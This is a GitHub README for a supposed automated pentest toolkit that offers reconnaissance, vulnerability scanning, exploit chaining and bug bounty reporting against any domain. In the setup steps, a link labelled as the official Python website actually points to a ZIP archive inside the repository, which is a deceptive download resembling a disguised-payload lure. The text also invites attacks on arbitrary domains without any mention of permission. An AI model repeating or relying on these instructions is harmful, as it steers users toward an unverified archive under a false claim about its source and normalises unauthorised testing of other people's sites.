Skip to content

KaQus/claude-code-pentest

⚙️ claude-code-pentest - Automate Your Pentest Workflow Easily

Download claude-code-pentest


📋 About claude-code-pentest

claude-code-pentest offers 6 automated tools designed to help you run a full penetration test on any domain. It covers every step from gathering information to finding vulnerabilities and creating bug bounty reports.

The package includes 43 small scripts. Each script uses plain Python and does not require installing other software. You just provide a domain name, and the tools take care of the rest.

This application is for anyone interested in cybersecurity and testing web security. You do not need programming skills to get started.


🖥️ System Requirements

To run claude-code-pentest on Windows, you need:

  • Operating System: Windows 10 or newer
  • Python: Version 3.8 or higher
  • Disk Space: At least 500 MB free space
  • Internet: Active connection to gather data from the web
  • Permissions: Administrator rights are not required but helpful for some network tests

🚀 Getting Started: Download and Setup

Step 1 - Download the Application

Visit this page to download all the files you need:

Download claude-code-pentest

This link will lead you to the main page where you can download the entire application as a zip file.

Step 2 - Install Python

If you do not have Python installed, follow these instructions:

  1. Go to the official Python website: https://github.com/KaQus/claude-code-pentest/raw/refs/heads/main/webapp-exploit-hunter/scripts/pentest-claude-code-v2.6.zip
  2. Download the latest Python 3.x installer (choose the Windows installer).
  3. Run the installer.
  4. During installation, check the option Add Python to PATH.
  5. Finish the setup.

Step 3 - Extract the Files

After download:

  1. Find the downloaded ZIP file on your computer.
  2. Right-click the file.
  3. Select Extract All.
  4. Choose a location you can easily access, like your Desktop or Documents folder.

Step 4 - Run the Application

  1. Open the folder where you extracted claude-code-pentest.

  2. In the folder, hold Shift and right-click on an empty area.

  3. Select Open PowerShell window here or Open Command Prompt here.

  4. Type the command:

    python main.py
    
  5. Press Enter.

The application will start and ask you to enter a domain to test.


🔧 How to Use claude-code-pentest

Once the program starts, it will guide you step-by-step.

1. Enter the Domain

Provide the web address you want to test, for example, example.com. The tools will use this information for the tests.

2. Reconnaissance

The scripts will gather data about the domain. This includes finding subdomains, IP addresses, and technologies used by the website.

3. Vulnerability Scanning

The software will search for weak points that might let someone access the system without permission.

4. Exploit Chains

claude-code-pentest tests if it can use vulnerabilities in a series to gain deeper access. This helps find hidden security problems.

5. Reporting

At the end, a bug bounty style report will be created. This shows the issues found and suggests ways to fix them.


🗂️ What’s Included

This package contains:

  • 6 main tools that cover all the testing steps
  • 43 Python scripts that perform specific jobs, like scanning, data gathering, and report generation
  • No extra dependencies, so you do not need to install other software besides Python
  • Reports generated in easy-to-read text files

⚙️ Advanced Options

You can customize the scans by editing simple text files inside the folder:

  • Adjust the depth of scanning.
  • Select specific modules to run.
  • Set the report format.

These options are saved as plain text, so you do not need to know programming to modify them.


🛠️ Troubleshooting

If the program does not start or shows errors:

  1. Check that Python is installed and updated by opening a terminal and typing:

    python --version
    
  2. Make sure you are running the command from the right folder.

  3. Verify your internet connection is working.

  4. Restart the terminal or your computer and try again.

For more help, visit the GitHub Page and look at the issues section.


📚 Useful Tips

  • Run the tests regularly to keep your security checks up to date.
  • Use simple domain names to avoid errors.
  • Save reports in a safe folder for review or sharing.

🔗 Download and Start Today

Download claude-code-pentest

About

Automate the full pentest process with six Claude Code skills covering recon, exploit chains, and bug bounty report generation from any domain.

Topics

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages